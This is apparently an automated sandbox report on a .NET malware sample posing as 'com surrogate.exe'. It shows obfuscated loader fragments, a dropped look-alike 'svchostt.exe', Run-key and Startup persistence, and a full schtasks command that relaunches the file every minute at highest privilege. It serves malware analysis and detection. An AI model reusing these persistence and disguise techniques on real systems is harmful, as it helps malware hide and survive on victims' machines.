                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: version.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: version.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: version.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: version.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\Desktop\com surrogate.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                      Source: svchostt.lnk.0.drLNK file: ..\..\..\..\..\..\..\svchostt.exe
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: com surrogate.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: com surrogate.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Data Obfuscation

                      barindex
                      .NET source code contains method to dynamically call methods (often used by packers)
                      Source: com surrogate.exe, HmgYWU24nC.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_0Xk4LAS8az.MsJoi7Bf8l,_0Xk4LAS8az._8rXrHd7miw,_0Xk4LAS8az.pOSYswDeQd,_0Xk4LAS8az.WNrZBMvdl7,TmY9KD9bMG._5sNCQ0x6ef()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: com surrogate.exe, HmgYWU24nC.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{OepsFAtL9A[2],TmY9KD9bMG.LJCimgw501(Convert.FromBase64String(OepsFAtL9A[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: com surrogate.exe, HmgYWU24nC.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { OepsFAtL9A[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: svchostt.exe.0.dr, HmgYWU24nC.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_0Xk4LAS8az.MsJoi7Bf8l,_0Xk4LAS8az._8rXrHd7miw,_0Xk4LAS8az.pOSYswDeQd,_0Xk4LAS8az.WNrZBMvdl7,TmY9KD9bMG._5sNCQ0x6ef()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: svchostt.exe.0.dr, HmgYWU24nC.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{OepsFAtL9A[2],TmY9KD9bMG.LJCimgw501(Convert.FromBase64String(OepsFAtL9A[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: svchostt.exe.0.dr, HmgYWU24nC.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { OepsFAtL9A[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 0.2.com surrogate.exe.2d2f730.0.raw.unpack, HmgYWU24nC.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_0Xk4LAS8az.MsJoi7Bf8l,_0Xk4LAS8az._8rXrHd7miw,_0Xk4LAS8az.pOSYswDeQd,_0Xk4LAS8az.WNrZBMvdl7,TmY9KD9bMG._5sNCQ0x6ef()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 0.2.com surrogate.exe.2d2f730.0.raw.unpack, HmgYWU24nC.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{OepsFAtL9A[2],TmY9KD9bMG.LJCimgw501(Convert.FromBase64String(OepsFAtL9A[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 0.2.com surrogate.exe.2d2f730.0.raw.unpack, HmgYWU24nC.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { OepsFAtL9A[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                      .NET source code contains potential unpacker
                      Source: com surrogate.exe, HmgYWU24nC.cs.Net Code: _7BsNBZ4IQi System.AppDomain.Load(byte[])
                      Source: com surrogate.exe, HmgYWU24nC.cs.Net Code: P8ZoDU9PCb System.AppDomain.Load(byte[])
                      Source: com surrogate.exe, HmgYWU24nC.cs.Net Code: P8ZoDU9PCb
                      Source: svchostt.exe.0.dr, HmgYWU24nC.cs.Net Code: _7BsNBZ4IQi System.AppDomain.Load(byte[])
                      Source: svchostt.exe.0.dr, HmgYWU24nC.cs.Net Code: P8ZoDU9PCb System.AppDomain.Load(byte[])
                      Source: svchostt.exe.0.dr, HmgYWU24nC.cs.Net Code: P8ZoDU9PCb
                      Source: 0.2.com surrogate.exe.2d2f730.0.raw.unpack, HmgYWU24nC.cs.Net Code: _7BsNBZ4IQi System.AppDomain.Load(byte[])
                      Source: 0.2.com surrogate.exe.2d2f730.0.raw.unpack, HmgYWU24nC.cs.Net Code: P8ZoDU9PCb System.AppDomain.Load(byte[])
                      Source: 0.2.com surrogate.exe.2d2f730.0.raw.unpack, HmgYWU24nC.cs.Net Code: P8ZoDU9PCb
                      Source: C:\Users\user\Desktop\com surrogate.exeCode function: 0_2_00007FFD9B7E00AD pushad ; iretd 0_2_00007FFD9B7E00C1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B6AD2A5 pushad ; iretd 1_2_00007FFD9B6AD2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B6AE380 push ecx; iretd 1_2_00007FFD9B6AE41C
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B7C00AD pushad ; iretd 1_2_00007FFD9B7C00C1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B892316 push 8B485F95h; iretd 1_2_00007FFD9B89231B
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B891AC8 push es; ret 1_2_00007FFD9B891AC9
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD9B6CD2A5 pushad ; iretd 5_2_00007FFD9B6CD2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD9B7E00AD pushad ; iretd 5_2_00007FFD9B7E00C1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD9B8B2316 push 8B485F93h; iretd 5_2_00007FFD9B8B231B
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD9B6ED2A5 pushad ; iretd 9_2_00007FFD9B6ED2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD9B8000AD pushad ; iretd 9_2_00007FFD9B8000C1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD9B8D2316 push 8B485F91h; iretd 9_2_00007FFD9B8D231B
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B6CD2A5 pushad ; iretd 11_2_00007FFD9B6CD2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B7E00AD pushad ; iretd 11_2_00007FFD9B7E00C1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B8B2316 push 8B485F93h; iretd 11_2_00007FFD9B8B231B
                      Source: C:\Users\user\svchostt.exeCode function: 15_2_00007FFD9B7F000C push edi; retf 0000h15_2_00007FFD9B7F002A
                      Source: C:\Users\user\svchostt.exeCode function: 15_2_00007FFD9B7F00AD pushad ; iretd 15_2_00007FFD9B7F00C1
                      Source: C:\Users\user\svchostt.exeCode function: 17_2_00007FFD9B7D00AD pushad ; iretd 17_2_00007FFD9B7D00C1
                      Source: C:\Users\user\svchostt.exeCode function: 18_2_00007FFD9B7D00AD pushad ; iretd 18_2_00007FFD9B7D00C1
                      Source: C:\Users\user\svchostt.exeCode function: 19_2_00007FFD9B7D00AD pushad ; iretd 19_2_00007FFD9B7D00C1
                      Source: com surrogate.exe, VSz7jnTmNY.csHigh entropy of concatenated method names: 'ajb9vjlo4Q', 'E33G6jmXl7', 'JOHc4j6jdh', 'ye6qOi0aVw00hEtMdNIZQsc4ALu4y5UwoooOW8fcEx', 'RxyN3Hddmf9R2rcoTcq7ayRXx9AiXK9VVBv4oq98yh', 'ymaiGQZqh8zdPxDqYXbTohRnaHiEne7UvUDvrLCHqJ', 'H2NUd91uckTaSArPYVctGnguQLmCvuJQem10d7VrIF', '_5gSv4yOg8QWw9n7pefpVLqIt6LpyChA5hxtuukzLsd', 'tCacjJBwcBXDiO0sZiwIwL4WqGKrbhqTaPqjyWI9Pp', 'itHsLzyJPPooimhNoFP6kHqeEewGuQc3fCJvyHQ0Tq'
                      Source: com surrogate.exe, SSDW2h8Bu2.csHigh entropy of concatenated method names: 'x6vc3FsdNT', 'K844Sa3pgA', 'C4B1OSffgm', 'RtzMzFD2Y0', 'UqKfA1pMWi', 'wdJUezNc1a', 'smhnlO4J44', '_39Bf3cn9oD', 'jbXQPYJQHC', 'mKtP0nJhH7'
                      Source: com surrogate.exe, TmY9KD9bMG.csHigh entropy of concatenated method names: 'W0fEdETOXV', 'uZfigOI1sw', 'smEqsHgW3z', 'wkhNUfGdpt', 'HH5zQxMR9g', 'Y0wWV39GV8', 'hNx61QRxdE', 'AHUbz88CWL', 'AiWPx31sl4', 'PQe3QHXKnP'
                      Source: com surrogate.exe, HmgYWU24nC.csHigh entropy of concatenated method names: '_5ar0Fpeld0', '_7BsNBZ4IQi', 'w5YHfU19q9', 'RSitqILqgT', 'RgJXYks985', 'XEo8BHyoYN', '_9y6dq12wra', 'l24vVhqYm6', 'pZ9Mn9VyEU', 'pIST06FXZx'
                      Source: com surrogate.exe, VffR91FvSC.csHigh entropy of concatenated method names: '_7xxuC5bIb7', 'ucZzEMCPxkvKcgv7WQWLgzIQoFCQ78uu4lsEHLwF4G', 'uY47gVZ1GXeKryhSGrhgj6wA8dciM4jrRythYuigEN', 'vp5IkScOkgA2G1aJOi49wfhK8foiw8V1aa14pM3xCs', 'G9Pone1lU4rIwts7geH20rGXgs4KFdHwPSuOTbrGaS'
                      Source: com surrogate.exe, ejashRItfb.csHigh entropy of concatenated method names: '_0lWmHzKxwA', 'Ip5GvT6uuz', 'IAhLWraESL', '_448ALCfdN3', 'aO8dVIS5qB', 'jz7vp4qAhy', 'aDpnmPoDCP', '_5Oh0qKyPnl', '_86zri9qwpH', 'V7qR7N1V66'
                      Source: com surrogate.exe, aMYd9j6M7p.csHigh entropy of concatenated method names: '_7gRd66NihM', 'SaU7m5hGOh', 'JsjdEbCUmL', 'TVcDWi34C5', 'QLbXfCkXYU', 'wkMU3zD5Mn', 'OQj7Gew95i', 'nUpROWLoUA', 'U94vHxsyNp', 'Zv7BfsuFCR'
                      Source: com surrogate.exe, ud8qZJW4yM.csHigh entropy of concatenated method names: 'r4FtEHEMcV', 'l43kpGgr2H', 'gNUKGfsQBA', 'bjUAKiZth4', 'nEHE0R0uEK', '_9RMCpklbs4', '_8hl9WUTHKe', 'mF5l8D5HeJ', 'gd7dd6pzAb', 'PqGTSWbGD5'
                      Source: svchostt.exe.0.dr, VSz7jnTmNY.csHigh entropy of concatenated method names: 'ajb9vjlo4Q', 'E33G6jmXl7', 'JOHc4j6jdh', 'ye6qOi0aVw00hEtMdNIZQsc4ALu4y5UwoooOW8fcEx', 'RxyN3Hddmf9R2rcoTcq7ayRXx9AiXK9VVBv4oq98yh', 'ymaiGQZqh8zdPxDqYXbTohRnaHiEne7UvUDvrLCHqJ', 'H2NUd91uckTaSArPYVctGnguQLmCvuJQem10d7VrIF', '_5gSv4yOg8QWw9n7pefpVLqIt6LpyChA5hxtuukzLsd', 'tCacjJBwcBXDiO0sZiwIwL4WqGKrbhqTaPqjyWI9Pp', 'itHsLzyJPPooimhNoFP6kHqeEewGuQc3fCJvyHQ0Tq'
                      Source: svchostt.exe.0.dr, SSDW2h8Bu2.csHigh entropy of concatenated method names: 'x6vc3FsdNT', 'K844Sa3pgA', 'C4B1OSffgm', 'RtzMzFD2Y0', 'UqKfA1pMWi', 'wdJUezNc1a', 'smhnlO4J44', '_39Bf3cn9oD', 'jbXQPYJQHC', 'mKtP0nJhH7'
                      Source: svchostt.exe.0.dr, TmY9KD9bMG.csHigh entropy of concatenated method names: 'W0fEdETOXV', 'uZfigOI1sw', 'smEqsHgW3z', 'wkhNUfGdpt', 'HH5zQxMR9g', 'Y0wWV39GV8', 'hNx61QRxdE', 'AHUbz88CWL', 'AiWPx31sl4', 'PQe3QHXKnP'
                      Source: svchostt.exe.0.dr, HmgYWU24nC.csHigh entropy of concatenated method names: '_5ar0Fpeld0', '_7BsNBZ4IQi', 'w5YHfU19q9', 'RSitqILqgT', 'RgJXYks985', 'XEo8BHyoYN', '_9y6dq12wra', 'l24vVhqYm6', 'pZ9Mn9VyEU', 'pIST06FXZx'
                      Source: svchostt.exe.0.dr, VffR91FvSC.csHigh entropy of concatenated method names: '_7xxuC5bIb7', 'ucZzEMCPxkvKcgv7WQWLgzIQoFCQ78uu4lsEHLwF4G', 'uY47gVZ1GXeKryhSGrhgj6wA8dciM4jrRythYuigEN', 'vp5IkScOkgA2G1aJOi49wfhK8foiw8V1aa14pM3xCs', 'G9Pone1lU4rIwts7geH20rGXgs4KFdHwPSuOTbrGaS'
                      Source: svchostt.exe.0.dr, ejashRItfb.csHigh entropy of concatenated method names: '_0lWmHzKxwA', 'Ip5GvT6uuz', 'IAhLWraESL', '_448ALCfdN3', 'aO8dVIS5qB', 'jz7vp4qAhy', 'aDpnmPoDCP', '_5Oh0qKyPnl', '_86zri9qwpH', 'V7qR7N1V66'
                      Source: svchostt.exe.0.dr, aMYd9j6M7p.csHigh entropy of concatenated method names: '_7gRd66NihM', 'SaU7m5hGOh', 'JsjdEbCUmL', 'TVcDWi34C5', 'QLbXfCkXYU', 'wkMU3zD5Mn', 'OQj7Gew95i', 'nUpROWLoUA', 'U94vHxsyNp', 'Zv7BfsuFCR'
                      Source: svchostt.exe.0.dr, ud8qZJW4yM.csHigh entropy of concatenated method names: 'r4FtEHEMcV', 'l43kpGgr2H', 'gNUKGfsQBA', 'bjUAKiZth4', 'nEHE0R0uEK', '_9RMCpklbs4', '_8hl9WUTHKe', 'mF5l8D5HeJ', 'gd7dd6pzAb', 'PqGTSWbGD5'
                      Source: 0.2.com surrogate.exe.2d2f730.0.raw.unpack, VSz7jnTmNY.csHigh entropy of concatenated method names: 'ajb9vjlo4Q', 'E33G6jmXl7', 'JOHc4j6jdh', 'ye6qOi0aVw00hEtMdNIZQsc4ALu4y5UwoooOW8fcEx', 'RxyN3Hddmf9R2rcoTcq7ayRXx9AiXK9VVBv4oq98yh', 'ymaiGQZqh8zdPxDqYXbTohRnaHiEne7UvUDvrLCHqJ', 'H2NUd91uckTaSArPYVctGnguQLmCvuJQem10d7VrIF', '_5gSv4yOg8QWw9n7pefpVLqIt6LpyChA5hxtuukzLsd', 'tCacjJBwcBXDiO0sZiwIwL4WqGKrbhqTaPqjyWI9Pp', 'itHsLzyJPPooimhNoFP6kHqeEewGuQc3fCJvyHQ0Tq'
                      Source: 0.2.com surrogate.exe.2d2f730.0.raw.unpack, SSDW2h8Bu2.csHigh entropy of concatenated method names: 'x6vc3FsdNT', 'K844Sa3pgA', 'C4B1OSffgm', 'RtzMzFD2Y0', 'UqKfA1pMWi', 'wdJUezNc1a', 'smhnlO4J44', '_39Bf3cn9oD', 'jbXQPYJQHC', 'mKtP0nJhH7'
                      Source: 0.2.com surrogate.exe.2d2f730.0.raw.unpack, TmY9KD9bMG.csHigh entropy of concatenated method names: 'W0fEdETOXV', 'uZfigOI1sw', 'smEqsHgW3z', 'wkhNUfGdpt', 'HH5zQxMR9g', 'Y0wWV39GV8', 'hNx61QRxdE', 'AHUbz88CWL', 'AiWPx31sl4', 'PQe3QHXKnP'
                      Source: 0.2.com surrogate.exe.2d2f730.0.raw.unpack, HmgYWU24nC.csHigh entropy of concatenated method names: '_5ar0Fpeld0', '_7BsNBZ4IQi', 'w5YHfU19q9', 'RSitqILqgT', 'RgJXYks985', 'XEo8BHyoYN', '_9y6dq12wra', 'l24vVhqYm6', 'pZ9Mn9VyEU', 'pIST06FXZx'
                      Source: 0.2.com surrogate.exe.2d2f730.0.raw.unpack, VffR91FvSC.csHigh entropy of concatenated method names: '_7xxuC5bIb7', 'ucZzEMCPxkvKcgv7WQWLgzIQoFCQ78uu4lsEHLwF4G', 'uY47gVZ1GXeKryhSGrhgj6wA8dciM4jrRythYuigEN', 'vp5IkScOkgA2G1aJOi49wfhK8foiw8V1aa14pM3xCs', 'G9Pone1lU4rIwts7geH20rGXgs4KFdHwPSuOTbrGaS'
                      Source: 0.2.com surrogate.exe.2d2f730.0.raw.unpack, ejashRItfb.csHigh entropy of concatenated method names: '_0lWmHzKxwA', 'Ip5GvT6uuz', 'IAhLWraESL', '_448ALCfdN3', 'aO8dVIS5qB', 'jz7vp4qAhy', 'aDpnmPoDCP', '_5Oh0qKyPnl', '_86zri9qwpH', 'V7qR7N1V66'
                      Source: 0.2.com surrogate.exe.2d2f730.0.raw.unpack, aMYd9j6M7p.csHigh entropy of concatenated method names: '_7gRd66NihM', 'SaU7m5hGOh', 'JsjdEbCUmL', 'TVcDWi34C5', 'QLbXfCkXYU', 'wkMU3zD5Mn', 'OQj7Gew95i', 'nUpROWLoUA', 'U94vHxsyNp', 'Zv7BfsuFCR'
                      Source: 0.2.com surrogate.exe.2d2f730.0.raw.unpack, ud8qZJW4yM.csHigh entropy of concatenated method names: 'r4FtEHEMcV', 'l43kpGgr2H', 'gNUKGfsQBA', 'bjUAKiZth4', 'nEHE0R0uEK', '_9RMCpklbs4', '_8hl9WUTHKe', 'mF5l8D5HeJ', 'gd7dd6pzAb', 'PqGTSWbGD5'
                      Source: C:\Users\user\Desktop\com surrogate.exeFile created: C:\Users\user\svchostt.exeJump to dropped file
                      Source: C:\Users\user\Desktop\com surrogate.exeFile created: C:\Users\user\svchostt.exeJump to dropped file

                      Boot Survival

                      barindex
                      Drops PE files to the user root directory
                      Source: C:\Users\user\Desktop\com surrogate.exeFile created: C:\Users\user\svchostt.exeJump to dropped file
                      Uses schtasks.exe or at.exe to add and modify task schedules
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchostt" /tr "C:\Users\user\svchostt.exe"
                      Source: C:\Users\user\Desktop\com surrogate.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostt.lnkJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostt.lnkJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchosttJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchosttJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Loading BitLocker PowerShell Module
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
